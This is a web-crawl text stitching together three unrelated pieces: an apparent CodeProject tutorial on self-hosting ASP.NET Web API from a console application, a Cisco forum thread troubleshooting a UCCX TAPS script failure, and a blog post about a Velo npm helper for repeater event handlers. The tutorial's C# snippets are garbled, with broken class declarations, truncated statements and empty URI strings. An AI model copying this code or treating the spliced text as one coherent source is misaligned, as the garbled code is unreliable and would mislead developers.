"Web API", as the name suggests, is an API and an API should not be coupled with any specific kind of application. An API is supposed to provide services without being coupled with its consumer application. There is a common misconception that for developing Web APIs, we have to go by ASP.NET MVC application. In this article, we will develop an independent API which is not coupled with a ASP.NET MVC application type. Web API is a framework for building HTTP services. Those developed services could be consumed by broad range of clients, including browsers and mobile devices. Web API is a feature of ASP.NET MVC 4. This included with MVC 4 because of their similarities. That doesn’t mean you always have to create ASP.NET MVC application for developing Web API. You can use Web API in any number of applications. As the philosophy of the service development is concerned, it’s all about exposing few service methods. We would not be bothered about the application type. MVC application is for a particular purpose where we have a consumer end as well. We should develop our services independent of its consumer. In this example, we will develop a Web API through a Console application. When developing Web API outside MVC, you need to refer Web API assemblies to your project. The NuGet Package Manager is the easiest way to add the Web API assemblies to a non-ASP.NET project. Once installation is done, you are all set to develop your Web API outside MVC. Start Visual Studio and select New Project from the Start page. Or, from the File menu, select New and then Project. On the Templates pane, under Visual C#, select Console Application. Enter a name for the project and click OK. Add a file Product.cs for to create a business model class. We will expose this business object through our Web API. Now, we need to add our Web API. Technically, the Web API method is nothing but a Web API controller class. In order to add the controller right click on the project and select Add New Item. In the Templates pane, select Installed Templates and expand the Visual C# node. Under Visual C#, select Web. Select Web API Controller Class. Enter a name for the class and click OK. Once you added the controller, we will find the class with auto-generated code: namespace WebAPISelfHost { public class Product) { } } } In the above code the controller class has been derived for from the ApiController class. This the key class for Web API. If we want to expose a controller through API, we have to derive the controller from the abstract class ApiController. Also, there are four auto-generated method stubs. Those are the stub methods related to four REST verbs GET, POST,PUT and DELETE. Since the Web API is REST based, the framework provides the structure for REST based Web services. ApiController In our example, we will develop a simple service for getting product details. So, remove the auto-generated code and implement a Web API GetProductList: GetProductList namespace WebAPISelfHost { public class ProductsController:ApiController { //[HttpGet] public List<Product> GetProductList() { List<Product> productLst = new List<Product>{ new Product{ProductID="P01",ProductName="Pen",Quantity=10,Price=12}, new Product{ProductID="P02",ProductName="Copy",Quantity=12,Price=20}, new Product{ProductID="P03",ProductName="Pencil",Quantity=15,Price=22}, new Product{ProductID="P04",ProductName="Eraser",Quantity=20,Price=27} }; return productLst; } } } In our API, we are simply returning a list of products. Compile the code and build the project. Now, our Web API is ready. We need to host the developed Web API. You can self-host a web API in your own host process. Here, we will Self-Host our developed Web API in the console application itself. Refer the System.Web.Http.SelfHost.dll in the project. This library provides classes for the HTTP self-hosted service. Open the file Program.cs and add the following namespaces using System.Web.Http; using System.Web.Http.SelfHost; Now, add the following code for Self-Hosting: quit."); Console.ReadLine(); } } In the above code, we have created a instance of HttpSelfHostConfiguration. The overloaded constructor of the class expects a Uri to listen to a particular HTTP address. In the MapHttpRoute method we are defining the routing pattern of our API. HttpSelfHostConfiguration MapHttpRoute Finally, we are using the configuration in the HttpSelfHostServer. Our Web API is hosted on the basis of our defined configuration. HttpSelfHostServer Compile and run the project. Now our Web API is up and ready to serve. Note: This application listens to. By default, listening at a particular HTTP address requires administrator privileges. When you run the application, therefore, you might get an error: "HTTP could not register URL".To avoid this error, run Visual Studio with elevated administrator permissions. Now it’s time to consume the Web API. Let's write a simple console application that calls the web API. Add a new console application project to the solution. As our API is returning a list of "product" types, we need to add the stub product class for identifying the returned type in our client code. Add the file Product.cs in the Client application. Open the file Program.cs file. Add the following namespace: using System.Net; using System.Net.Http; using System.Runtime.Serialization.Json; using System.Net.Http.Formatting; using System.Net.Http.Headers; using EventStore.Serialization; Create an instance of a HttpClient class and set the base address with the listener URI of the Web API. HttpClient HttpClient client = new HttpClient (); client.BaseAddress = new Uri (""); Add the accept header. Here we are using a feature of HTTP as well as Web API called "Content Negotiation". According to this feature a Client can negotiate with the server regarding the format of the data it returned. Here, we negotiating with the server in JSON format. // Add an Accept header for JSON format. client.DefaultRequestHeaders.Accept.Add( new MediaTypeWithQualityHeaderValue("application/json")); Use the HttpClient.GetAsync method to send a GET request to the Web API. Provide the routing pattern. HttpClient.GetAsync // List all products. HttpResponseMessage response = client.GetAsync ("api/products").Result; Use the ReadAsAsync method to serialize the response. ReadAsAsync method returns a Task that will yield an object of the specified type. ReadAsAsync The GetAsync and ReadAsAsync methods are both asynchronous. They return Task objects that represent the asynchronous operation. Getting the Result property blocks the thread until the operation completes. GetAsync if (response.IsSuccessStatusCode) { // Parse the response body. Blocking! var products = response.Content.ReadAsAsync<IEnumerable<Product>>().Result; Finally, print the data retrieved from the Web API: foreach (var p in products) { Console.WriteLine("{0}\t{1};\t{2}", p.ProductID, p.ProductName, p.Quantity); Console.ReadLine(); } } else { Console.WriteLine("{0} ({1})", (int)response.StatusCode, response.ReasonPhrase); } Build and run the application (Server application should be up). You should get the following output:.
https://www.codeproject.com/Articles/769671/Web-API-without-MVC
CC-MAIN-2017-43
refinedweb
1,154
61.43
A number of SeattleWireless geeks and I have been working on getting a shell on the Linksys WRT54G access point. It is in fact running Linux 2.4.5 with a number of interesting bits in the filesystem (namely full iptables support, zebra, bridging, and even a Rendezvous responder). Of course, that’s not nearly enough for me. I want NoCat running on this puppy (probably NoCatSplash or Cheshire first, NoCatAuth to follow) along with IP tunnels, maybe vtun, some monitoring code, and maybe even some mesh bits. Since their kernel apparently supports loadable modules, this is all entirely possible. Almost. We’re very close to getting a custom firmware on this puppy, but I’m currently stuck trying to compute a CRC value that the AP will accept (details are up on the SeattleWireless site). I’ve just sent this comment to Linksys. It probably won’t amount to much, but you never know. Hello-- I am very excited about your decision to include Linux and other GPL code in your recent 54G line. It appears from recent firmware updates that you have very interesting and ambitious plans for this line of equipment. I was wondering if you have published the format of your firmware update files. Parts of it are obviously a CramFS archive and Linux kernel, as well as various header bits. I imagine a CRC of the file is involved for error checking purposes, and required for the AP to accept new firmware. If the open source community were provided technical details about your firmware file format, I believe you would see an unprecedented interest in your 54G line. The ability to run custom Linux software on a commercial access point would certainly make it one of the most desirable access points on the market. The lack of documentation for the firmware header (particularly the CRC and other error checking) currently make it difficult to fully customize the 54G line. My particular interest is in extending your hardware to support NoCatAuth (), the open source captive portal implementation, as well as other community network oriented software. This may be outside the scope of your original plans with the 54G line, but please consider the potential benefit of providing the wireless community networkers with this information. Best regards, --Rob Flickenger So, while we wait for a reply from Linksys/Cisco, who in the audience is good with bit math? Had any luck dissecting the Linksys WRT54G firmware? Hi, I'm trying to set up a free public WiFi hotspot in Birmingham, England. Trouble is that I *need* to have a "terms and conditions" page viewed and accepted by all users before they actually surf the web. The combination of the WRT54G and NoCatSplash seems like it would meet my requirement admirably. I'm therefore *very* interested to keep tabs on your progress. I'm not too familiar with firmware updates but I'm happy with compiling and running software using cygwin. Hopefully this will be enough to produce a customised "terms and conditions" page and upload it. Thanks for all your hard work! Best Regards, Dave Boden But where are your broadcomm drivers? When Linksys announced the release of the linux components I went and downloaded them poking through looking to see if they had included any sort of driver for broadcomm's radio, but I didn't see anything. So, even if you were to get your new firmware onto the WRT54G, wouldn't you still be lacking support for the Radio/MAC? But where are your broadcomm drivers? The broadcomm drivers are in the firmware itself, in the form of loadable kernel modules. I can't see a good reason (yet) to change the kernel, but adding some open source software to the (mostly) open source firmware is very straightforward. Mount the CramFS, copy it out, add what you want, and build another one. But that is all to come, once this CRC issue is resolved. Not sure whether this is what is needed... /** * Utility to calculate what should be put in bytes 8..11 * within linksys firmware. It takes the CRC32 of locations * 12..end and calculates what should be put in bits 8..11. * * From * * 8..11 is crc32 checksum of the file from location 12...end and then inversed bits * ex crc32 of rest of file is 473D75C1 then location 8..11 will be "3E 8A C2 B8" * @author dave@emobus.com */ public class ConvertCRC { public static void main(String[] args) { if(args.length != 1 || args[0].length() != 8) { System.out.println("Usage: java -cp . ConvertCRC 473D75C1"); return; } //input is definitely an 8 character string String input = args[0]; //Get 4 bytes from the 8 characters on the command line byte[] crc32 = new byte[4]; try { crc32[0] = (byte)Integer.parseInt(input.substring(0, 2), 16); crc32[1] = (byte)Integer.parseInt(input.substring(2, 4), 16); crc32[2] = (byte)Integer.parseInt(input.substring(4, 6), 16); crc32[3] = (byte)Integer.parseInt(input.substring(6, 8), 16); } catch(NumberFormatException ex) { System.out.println(input + " does not contain only hex numeric characters"); return; } //Compile the output by moving the bits around //Swap the order and invert the bits (~ = not) byte[] output = new byte[4]; output[0] = (byte)~crc32[3]; output[1] = (byte)~crc32[2]; output[2] = (byte)~crc32[1]; output[3] = (byte)~crc32[0]; System.out.println("Result is: " + toHexString(output[0]) + toHexString(output[1]) + toHexString(output[2]) + toHexString(output[3])); } private static String toHexString(byte b) { String returnMe = Integer.toHexString(b); switch(returnMe.length()) { case 0: return "00"; case 1: return "0" + returnMe; default: return returnMe.substring(returnMe.length() - 2, returnMe.length()); } } } Hmmm... With my last post (java program) I was getting confused with the WAP54G, which has already been successfully hacked. Doesn't seem to work with the WRT54G unfortunately. I'm interested in the fact that the reported file size is the actual file size - 1024 bytes. I've therefore been doing CRC checks on the firmware file after removing the first 1024 bytes: $ dd if=WRT54G_1.30.1_US_code.bin of=crcme bs=32c skip=32c I get a CRC32 of b2b654c8 and the size of the crcme file is 2740224, the same as what is reported in the header. Calculating the CRC Interesting idea. Unfortunately, the magic CRC is at 0x28-0x2C is 78 53 6C D5. I wonder if they're slicing it some other way to be 1k smaller and CRC'ing that... I noticed that about the reported file size as well (how it's 1024 smaller than the actual size.) Coincidentally, this always makes it end in 00 in big endian (29D000), and has for all three versions of the firmware I could find. Thanks for the code! And for those playing at home who prefer perl to java, here's the crc program I'm using: #!/usr/bin/perl use String::CRC32; scalar(@ARGV) || die "Usage: crc32 [file]\n"; for my $file (@ARGV) { open(SOMEFILE, "<$file") || die "Couldn't open $file: $!\n"; $crc = crc32(*SOMEFILE); close(SOMEFILE); print sprintf('%08x',$crc) . " $file (" . sprintf('%08x', (0xffffffff - $crc)) . ")\n"; } The first number reported is the CRC32, the second (in parenthesis at the end) is the one's complement. Calculating the CRC Good to see that the Seattle Wireless guys seem to have solved it: $ dd if=WRT54G_1.30.1_US_code.bin of=crcme bs=1c skip=44c count=2740212c Gives you a CRC of: 2a93ac87 When you flip the bits and 1s compliment (using the bit of Java that I posted if you wish) you get the required 78536CD5. Looks like you strip the 0xFF values from the end of the file (leaving the 0x00 padding where it is) and then take the CRC from byte 44 to the new end of the file. Cheers, Dave WRT55AG Dunno, if anyone noticed, but the Linksys WRT55AG (tri-mode router) is running linux, too.. Imre Kaloz Close look up in paris hi here in paris wifi man (joke roaming on o'reilly) and his sidekicks are very interesting in the development of a custom made firmware with nocatsplash and why not a mesh networking protocol on the blue/black box delivered by linksys but i try to understand seattlewireless' pages about what has been done and at which point it is now and i must confess i've some troubles to get (surely langage fence :) so where is it now ? we are on starting blocks here in paris to set it up WEP/WPA Splash Screen Would it be possible for me to instead of locking out people without my key, let them connect... but if they are not using the key when they try to goto a website they just get a page that basically tells them they need to connect using our keys, contact the netadmin for them, etc etc... Sounds like what I want to do would be similar to NoCatSplash but isnt that basically just a terms/login system? That might suffice but would'nt it be better to use WPA and just tell them to enter the key? I don't know much about wifi technologies yet, I am trying to read up on it... but the fact that I can load stuff on my linksys router should make this much easier...
http://www.oreillynet.com/etel/blog/2003/07/linux_on_the_linksys.html
crawl-002
refinedweb
1,546
71.04
Welcome to Cisco Support Community. We would love to have your feedback. For an introduction to the new site, click here. And see here for current known issues. I have setup TAPS as per the Cisco documentation and I cannot for the life of my work out what is going on. I can auto-register a phone and dial the TAPs RoutePoint and get redirected to one of the DNs. But i get the message "I'm sorry, we're currently experiencing sytem problems...". I have everything in the right partition / CSS, my RPs are registered, AAR application is installed and the script is present. I have done a data check and sync and that all looks ok. What could be the issue here? Anyone have some ideas? UCCX 9 with UCM 9.0(2) Could be a problem with AXL. Can you do things: Anthony Holloway Please use the star ratings to help drive great content to the top of searches. I have just re-checked all the credentials - RMCM, JTAPI and AXL, all are definitely correct. How does one go about a reactive debug? I can see this in some MIVR traces through that lead me to check the credentials: 5178: Oct 04 09:23:25.607 WST %MIVR-SS_RM-7-UNK:Processing msg: SessionTerminatedMsg (Rsrc:null ID:1034/1 Type:IAQ Cause:INVALID Abort)) 5179: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.getRmCmContact(1034/1) returns 16778250 [1034/1] 5180: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.removeContactResourceTuple(1034/1) removing resource 9009 5181: Oct 04 09:23:25.607 WST %MIVR-SS_RM-7-UNK:RsrcMgr.removeContactFromCTIPort, port: 9009 5182: Oct 04 09:23:25.607 WST %MIVR-SS_CM-7-UNK:ContactMgr.getRmCmContact(1034/1) returns 16778250 [1034/1] 5183: Oct 04 09:23:25.608 WST %MIVR-SS_CM-7-UNK:RmCm contact 16778250[1034/1] (0) .removeConnectedResource(9009) 5184: Oct 04 09:23:25.608 WST %MIVR-SS_CM-7-UNK:RmCm contact 16778250[1034/1] (0) .dequeueAll(CONTACT_ABORTED) Could there be a service not running on the CUCM that I need? (10.254.11.200 is my lab CUCM Publisher). 9000 is my Trigger and 9001-9010 are the IVR ports. The script is not triggered on a reactive debug so something else must be a miss. That's good that you checked the credentials for those three accounts. And two things about that: Also, I actually meant your credentials on the TAPS application. However, looking at the TAPS script I can see that there are no credentials to supply, only the AXL server address. Did you supply this? And yes, the AXL service needs to be running on your AXL server (most cases this is your Pub). Speaking of your Publisher, you mentioned your lab publisher. Is this UCCX your lab UCCX also, or production UCCX? If you know where I'm going with this, then you'll probably agree that this is a crazy question to ask, but then again, this is a public support forum, and anything is a possibility. No offense intended. Is it possible you are hitting the same issue as this person? Backwards compatibliity issue? Anthony Holloway Please use the star ratings to help drive great content to the top of searches. 1) Yes, both devices 2) Ah ok, good to know. There is only the CUCM address to be specified, I've confirmed that I put the publisher CUCM, updated the script, application and restarted the engine service to "IN SERVICE" state. The AXL service is running on the publisher - can successfully create other objects (like CTI RPs etc). All applications mentioned are in a lab - nothing is in prod or mimiciking an actual prod environment. The UCCX is version 9.0 and CUCM is 9.1(2) - according to all docs should be compatible. I have only edited the TAPS script in the UCX editor downloaded from the cluster. How does this "Default Script" work? What purpose does it serve? Thanks for your help! Default Scripts are invoked when an exception occurs in the Main Script (simply called Script) of an Application. The System Default script is the one that plays the "I'm sorry, we're currently experiencing system problems..." message. You can change it, but that's not necessary for what you are trying to do. So, back to restarted the Engine, did you initially do this after installing the TAPS.aar file? It loads a custom JAR file and therefore, the Engine needs to be restarted before it will work. Back to the credentials error in your log file, are you still seeing that, or is it cleared up now? Anthony Holloway Please use the star ratings to help drive great content to the top of searches. Hi Tim , Can you please check TAPs services in call manager is started 199164: Oct 07 08:08:09.002 WST %MIVR-APP_MGR-6-ABORTING_CONTACT:Aborting contact: Application=TAPS,Task id=32000000001,Contact id=0,Contact implementation id=1038/1,Contact.cisco.call.CallContact,Contact Type=Cisco JTAPI Call) From the error in the MIVR logs we can see that connection is refused from call manager . If all the configuration are according to documenation then might be issue with TAPS service in call manager Regards Ravi The TAPS service is definitely started and activated on the CUCM publisher. I have even restarted the pub, just to be sure. Any other suggestions? What do i need to enable to trace for TAPS issues on the CUCM side? Having battled with this before, I can offer a short list of suggestions you might verify. These have helped me in the past. 1. Install a basic answer and queue script (grab one out of the repository). You'll need to create a CSQ for it to point to, but make sure it can answer the phone and talk to you. This will validate call control and IVR functionality. 2. On your TAPS script, you MUST enter in the IP address of the CUCM Publisher server. Did you remember to do that? it will fail if it isn't there. 3. After you installed the TAPS.AAR file, did you REBOOT the UCCX server? I have found that not doing this is often the cause of many lost cycles. TAC even recommends that you reboot after installing the TAPS.AAR file. After you've done the above 3, if it's still blowing up, you might want to use the UCCX editor and run a debug on the TAPS script to see if you can determine where it's blowing up. If you can figure out where, you can likely figure out WHY. Hope this helps. Cliff Ok, i've done the following: 1) A basic script worked just fine. 2) I can definitely confirm that i have entered the CUCM publisher IP address into the script within the application menu and within the script itself. The F5 debug on the script returns no syntax errors. 3) After removing everything then reinstalling the AAR file, I restarted the UCCX server and both TAPS and BAT Provisioning service on CUCM. I'm still seeing the same result and the same "permission denied" message in the trace files. Upon running the script with a reactive debug, it fails on the 9th line in with the error message "Connection Refused to Host 10.254.11.200; nested exception... Permission denied" - basically the same as the trace file. This line is: variable: $auth 7~&y!mI,%Qd(_cc.bcYbj7&=keL`N1mQ_=`vbS]v objTAPS value: $auth j=&m!=8iNldNtKc#(Mq9B{s!3(LPNXd^_P`gQSqt { return (com.cisco.ccm.taps.service.TAPSIntf)java.rmi.Naming.lookup(rmiURL); } I also upped the permissions on the RMCM and JTAPI user accounts to full admin priviledges too see if this would make any difference: nothing changed. Hmmm..... Dumb question here: Do you have forward AND REVERSE (A and PTR) records for both CUCM and UCCX in DNS? Hint, these are REQUIRED. Lots of folks forget about the PTR records, and they can cause all kinds of headaches..... Have you VERIFIED that they are available via NSLOOKUP pointed at the same DNS servers used by UCCX and CUCM? please use below command to check DNS settings on UCCX and call manager "utils network host ipaddress/hostname of call manager/UCCX " Seems forward and reverse from UCCX is working: admin:utils network host LABCUCMPUB Local Resolution: Nothing found External Resolution: LABCUCMPUB.voicelab.local has address 10.254.11.200 admin:utils network host LABUCCX01 Local Resolution: LABUCCX01.voicelab.local resolves locally to 10.254.11.220 External Resolution: LABUCCX01.voicelab.local has address 10.254.11.220 admin:utils network host 10.254.11.200 Local Resolution: Nothing found External Resolution: 200.11.254.10.in-addr.arpa domain name pointer labcucmpub.voicelab.local. admin:utils network host 10.254.11.220 Local Resolution: 10.254.11.220 resolves locally to LABUCCX01.voicelab.local External Resolution: 220.11.254.10.in-addr.arpa domain name pointer labuccx01.voicelab.local. admin: And on CUCM: admin:utils network host LABCUCMPUB Local Resolution: LABCUCMPUB.voicelab.local resolves locally to 10.254.11.200 External Resolution: LABCUCMPUB.voicelab.local has address 10.254.11.200 admin:utils network host LABCUCMUCCX01 Local Resolution: Nothing found External Resolution: No external servers found admin:utils network host LABUCCX01 Local Resolution: Nothing found External Resolution: LABUCCX01.voicelab.local has address 10.254.11.220 admin:utils network host 10.254.11.200 Local Resolution: 10.254.11.200 resolves locally to LABCUCMPUB.voicelab.local External Resolution: 200.11.254.10.in-addr.arpa domain name pointer labcucmpub.voicelab.local. admin:utils network host 10.254.11.220 Local Resolution: Nothing found External Resolution: 220.11.254.10.in-addr.arpa domain name pointer labuccx01.voicelab.local. admin: Both are pointing at the same Windows DNS server where there are A records and PTR records for each machine in the lab. what is package of UCCX standard/premium/Enhance ? Premium on demo licences (as it's a lab) Ok...those look right. When you go to CUCM and pull up the application user for the AXL account used by UCCX, when you scroll to the bottom, what roles and permissions do you see on it? I always just mine a member of the Standard Tab Sync group, and that gets it what it needs, but what do you have? And on the CUCM server, could you log into the CLI and run the command UTILS SERVICE LIST and post the results? And just to confirm....the TAPS.AAR file you uploaded to UCCX came off of the SAME CUCM server you're connected to and wanting to run TAPS with correct? Definitely the same CUCM I downloaded .aar file from. CUCM Publisher (10.254.11.200) Services: DHCP Monitor Service[STARTED] Cisco DRF Local[STARTED] Cisco DRF Master[STARTED] Cisco Database Layer Monitor[STARTED] Cisco Dialed Number Analyzer[STARTED] Cisco Dialed Number Analyzer Server[STARTED] Cisco DirSync[STARTED] Cisco E911[STARTED] Cisco ELM Admin[STARTED] Cisco ELM Client Service[STARTED] Cisco ELM DB[STARTED] Cisco ELM Server Messaging Interface[STOPPED] Component is not running Cisco RIS Data Collector[STARTED] Cisco RTMT Reporter Servlet[STARTED] Cisco SOAP - CDRonDemand Service[STARTED] Cisco SOAP - CallRecord Service[STARTED] Cisco Serviceability Reporter[STARTED] Cisco Syslog Agent[STARTED] Cisco TAPS Service] System Application Agent[STARTED] Cisco ELM Resource API[STOPPED] Service Not Activated Primary Node =true AXL User Roles: Stanard AXL API Access (created by me) Stanard CTI Enabled Standard TabSync User (only just added now, need to test) Any new ideas on this one guys? I'm at the end of my teather with this one!!! :S I have exactly no idea why this will not work!!! Looking back through your thread, I didn't see a couple of things: 1. On the UCCX server, if you type SHOW VERSION ACTIVE, what does it return? 2. on the CUCM server if you type SHOW VERSION ACTIVE, what does it return? 3. Can you please post a screen shot showing the step where it's failing in the script? 4. Did you try rebuilding the UCCX server (you said it's a lab box)? 5. Have you done ANY hacks on either server? Not judging, but need to know. I've got a UCCX box at the latest release, and I think my lab CUCM is the latest release as well. Glad to validate the issue with you. I've taken this over from Tim - the UCCX and CUCM have been rebuilt, and we're seeing exactly the same issue. I've run through the suggestions/checks in this thread, and everything looks OK config wise... Refer below for the additional information requested - Note that a similar symptons were reported here: - can anyone confirm they have TAPS working with UCCX/CUCM9 ? 1. On the UCCX server, if you type SHOW VERSION ACTIVE, what does it return? admin:show version active Active Master Version: 9.0.1.10000-10 Active Version Installed Software Options: No Installed Software Options Found. 2. on the CUCM server if you type SHOW VERSION ACTIVE, what does it return? admin:show version active Active Master Version: 9.1.1.10000-11 Active Version Installed Software Options: No Installed Software Options Found. 3. Can you please post a screen shot showing the step where it's failing in the script? 4. Did you try rebuilding the UCCX server (you said it's a lab box)? UCCX server (and CUCM cluster) have been rebuilt - IPs/Hostnames etc have changed - new CUCM Pub IP is 10.254.11.10, 5. Have you done ANY hacks on either server? Not judging, but need to know. No changes other than IP/Hostnames and basic CUCM config... Sam. I had missed in the beginning that this is running on v9. Thanks for providing the screenshot. It does validate some of what I was wondering about. The TAPS script is failing on the step where it's starting the java object that communicates back with CUCM. I haven't checked the bug list for this one (did you?). Also, I realize this is a lab, but do you also have a production system here, or is this a learning environment only where there is no production system? I ask because availability of TAC resources is affected by whether or not there is a support contract in place on the production system. Lastly, there are later versions of BOTH CUCM and UCCX software available. Have you tried doing this with a later version (where the issue might have been addressed)? Cliff
https://supportforums.cisco.com/t5/contact-center/taps-quot-currently-experiencing-system-problems-quot/td-p/2327092
CC-MAIN-2017-51
refinedweb
2,451
67.65
[ ] ASF GitHub Bot commented on GEARPUMP-339: ----------------------------------------- GitHub user manuzhang opened a pull request: [GEARPUMP-339] Add ScalaDoc to Streaming DSL plan_doc Alternatively you can review and apply these changes as the patch at: To close this pull request, make a commit to your master/trunk branch with (at least) the following in the commit message: This closes #212 ---- commit c2446fb54fce1ce727243be45391710d4a0dee0f Author: manuzhang <owenzhang1990@gmail.com> Date: 2017-08-05T16:56:18Z [GEARPUMP-339] Add ScalaDoc to Streaming DSL ---- > Improve ScalaDoc for all public classes > --------------------------------------- > > Key: GEARPUMP-339 > URL: > Project: Apache Gearpump > Issue Type: Improvement > Affects Versions: 0.8.4 > Reporter: Manu Zhang > Assignee: Manu Zhang > > All public classes should have ScalaDoc and any warnings should be fixed. -- This message was sent by Atlassian JIRA (v6.4.14#64029)
http://mail-archives.apache.org/mod_mbox/gearpump-dev/201708.mbox/%3CJIRA.13092672.1501925950000.101412.1502001360076@Atlassian.JIRA%3E
CC-MAIN-2017-47
refinedweb
129
59.67
Posts17 Joined Last visited About Silverback IS Profile Information - GenderNot Telling Silverback IS's Achievements Newbie (1/14) 4 Reputation - Sorry, you are correct, I didn't mean to confuse the situation! It is another potential solution to the main problem that a user can get completely stuck, and would provide a way they could scroll out of the draggable area to pinch and zoom. Easiest to demonstrate on CodePen: So with the draggable area larger than the container, it'd be great if AutoScroll could be set to scroll the body when it reaches the edge of the container. I hope this helps to clarify, but I'm happy to start a new topic if this is not the best place to suggest this as an alternative way of preventing a user getting stuck. Sorry for my delayed reply as well! - What about the idea of scrolling the next scrollable parent (perhaps defined by the user) instead of bouncing if already at the container boundary? If enabled it could default to scrolling the body if enabled? Similar to a scrollable div in iOS with -webkit-overflow-scrolling:touch applied - Fair enough, thanks Jack I'll go down the route of disabling pinch zooms through JS if possible. - Or alternatively...you could have a setting so that when you reach the boundary the touch move behaviour could scroll another element (by default the body perhaps). Kind of like how iOS scrollable elements work. You can scroll to the end, you get a bounce, but when the bouncing stops, if you then try and scroll down, the next parent element which is scrollable will start scrolling. That way at least you could get out of the area where you cannot pinch-zoom. (Wouldn't work for Google Maps, but I don't know if anyone is using draggable for an infinite sized canvas) - It's almost as if Apple have done something silly by not allowing developers to easily prevent zooming on mobile layouts It does seem like it may not be possible if the first touch has to have default behaviours prevented. The only thing I could think is allowing a user to only zoom if both touches are simultaneous. Also perhaps delaying the preventDefault() function by 200-300ms to see if there's a second touch but I'm not sure if that'd work either. - Jonathan: The behaviour is easily replicated on any draggable element in all existing demos. The difference is that the draggable element in our site is a large area. But essentially what I need to work out if I can do is perform native zooming with the touches starting on the draggable element. You can't zoom in or out when touching the draggable element, but if I zoom in on the page then scroll into a large area where the draggable element fills the screen, a user wouldn't then be able to zoom out or scroll away. Jack: Thank you very much - I imagine it'd be a task and perhaps not possible, but thought it was worth asking the question. Thank you for your response. My other option is to disable pinch zooming using javascript which I think will be OK if there isn't another workaround. Thanks both! Sorry for my delayed reply.. Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPIf it helps anyone else I've also found out that if you have a link surrounding an SVG shape/polygon, adding touchstart/touchend events to the shape or the link seems to result in the link having to be clicked many times on Chrome for Android. As a result, I will have to use those events and detect the distance moved manually to trigger a click like event. Probably a browser bug. Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPAfter stripping out the draggable plugin until the links were working again, I've built it back up and realise the solution by OSUBlake is great and fixes the issue - thank you! Firstly, I had read that the xlink namespace was deprecated, but by not using the namespace, link links surrounding the SVG shapes were not clickable even without initialising the draggable plugin. So I got the links working again without draggable then the fun began. Without the 'allowEventDefault' value being true, not even the onClick event on Draggable will fire. By setting it to true, I can get the onClick from Draggable and the click event on the link themselves. I've only enabled that for Android mobile devices so far ( very useful mobile detection scripts here ). I have more testing to do on Explorer/Edge but thanks for helping get to this stage! Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPI've just tried that which didn't work unfortunately - but thank you for the help. I imagine it is to do with how I've structured my HTML and the way I'm positioning the SVG shapes with a link surrounding them. Even though in the inspector I can hover over the links and they appear to be there and in the correct place I have a feeling it's got something to do with it. I'm setting up a test page on my site where I can continue to play step-by-step with what works and what doesn't. I don't know at what point it stopped working but it may have even been a browser update or something. If I take draggable off completely, those links don't appear to be clickable on the android devices. I can see now from experience that Android Chrome is very odd with how it handles touch/click events. I'll be back on here when I figure it out Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPThanks very much for this, it's been very helpful - it's revealed there must be something else interfering some how. The onClick handler on draggable has the same behaviour issue where the triggerElement needs to be tapped multiple times to trigger the event. I can see the CodePen works well though so it cannot be an issue with Greensock. Allowing the default event doesn't make a difference either. It is strange because once I manage to trigger that event, without dragging the area the click event triggers without an issue, as soon as I drag the element again, I have to tap lots of times. I'll keep plugging away at it. Thanks again! Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPFor more information, it appeared to work once on the device - but it may be similar to our website where the click functionality works before the element has been dragged a first time. Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPHi, I've created a codepen here: With this simple implementation I can put an event on the clickable element inside the draggable element which triggers a popup. This works on iOS, desktop but fails on Chrome on Android - This can be replicated on a S7 Edge running the latest OS and a Samsung S5 OS 6.0.1 - Chrome on the S5 is version 52.0.2743.98 It'd be great if you can help by letting me know if there's a more recommended way of implementing this functionality. Thanks again. Daniel Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPThanks Carl, it may be easier for me to strip back our current site and test step by step. If I find anything useful that may be beneficial to the rest of the community I'll definitely post it here - and if I can find a simple way to recreate the problem I'll create a CodePen. Thank you for your very prompt reply. Draggable - Android issue clicking links with dragClickables:true Silverback IS replied to Silverback IS's topic in GSAPI forgot to say but the 'onClick' event on the draggable instance has the same problem. Please let me know if any more code would be helpful - thanks again.
https://staging.greensock.com/profile/36905-silverback-is/
CC-MAIN-2021-43
refinedweb
1,416
64.04
Velo by Wix: The utils for repeated item scope event handlers npm library with utils for event handlers in Repeater In the article "Event handling of Repeater Item", we considered how to handle events in the repeater items and why we shouldn't nest event handler inside the Repeater loop. There we created a code snippet that encapsulates the logic for receiving item selector and item data. Copying and pasting the snippet of code isn't comfortable. Therefore I moved these little helpers to npm package repeater-scope. You can install this package using Package Manager There is available a method that can automatic find the parent Repeater by the fired event object. import { useScope } from 'repeater-scope'; $w.onReady(() => { $w('#repeatedButton').onClick((event) => { const { $item, itemData, index, data } = useScope(event); $item('#repeatedText').text = itemData.title; }); }); Returns parameters - $item - A selector function with repeated item scope. - itemData - The object from the repeater's dataarray that corresponds to the repeated item being created. - index - The index of the itemDataobject in the dataarray. - data - A repeater's data array How it works The useScope(event) accepts Event object. With the Event object, we can get the target element. It's the element that the event was fired on. Also, we can get a type and parent element for any editor element. // Gets the element that the event was fired on. const targetElement = event.target; // Gets the element's parent element. const parentElement = event.target.parent; // Gets the element's type. const elementType = event.target.type; In the first, let's find the parent repeater where the child item was handle. We will climb up the parent's elements until we will get the $w.Repeater element. let parentElement = event.target.parent; // Check the parent element type. // If it isn't a Repeater take the next parent of the parent element. while (parentElement.type !== '$w.Repeater') { parentElement = parentElement.parent; } We get the repeater data array directly from the repeater property. const data = parentElement.data; We have itemId in the event context object. With this ID we can found the current itemData and index where the event was fired from. // ID of the repeater item where the event was fired from const itemId = event.context.itemId; // Use the Array methods to find the current itemData and index const itemData = data.find((i) => i._id === itemId); const index = data.findIndex((i) => i._id === itemId); And the last, we create a selector function for the target element. We can use the event context with $w.at() to get a selector function. // Gets a selector function // which selects items from a specific repeater item const $item = $w.at(event.context); Any questions? If you have any issues as bugs, feature requests, and more, please contact me GitHub Issue, or my personal Twitter. I hope this small library will helpful in your projects too.
https://shoonia.site/the-utils-for-repeated-item-scope-event-handlers
CC-MAIN-2021-49
refinedweb
476
60.51
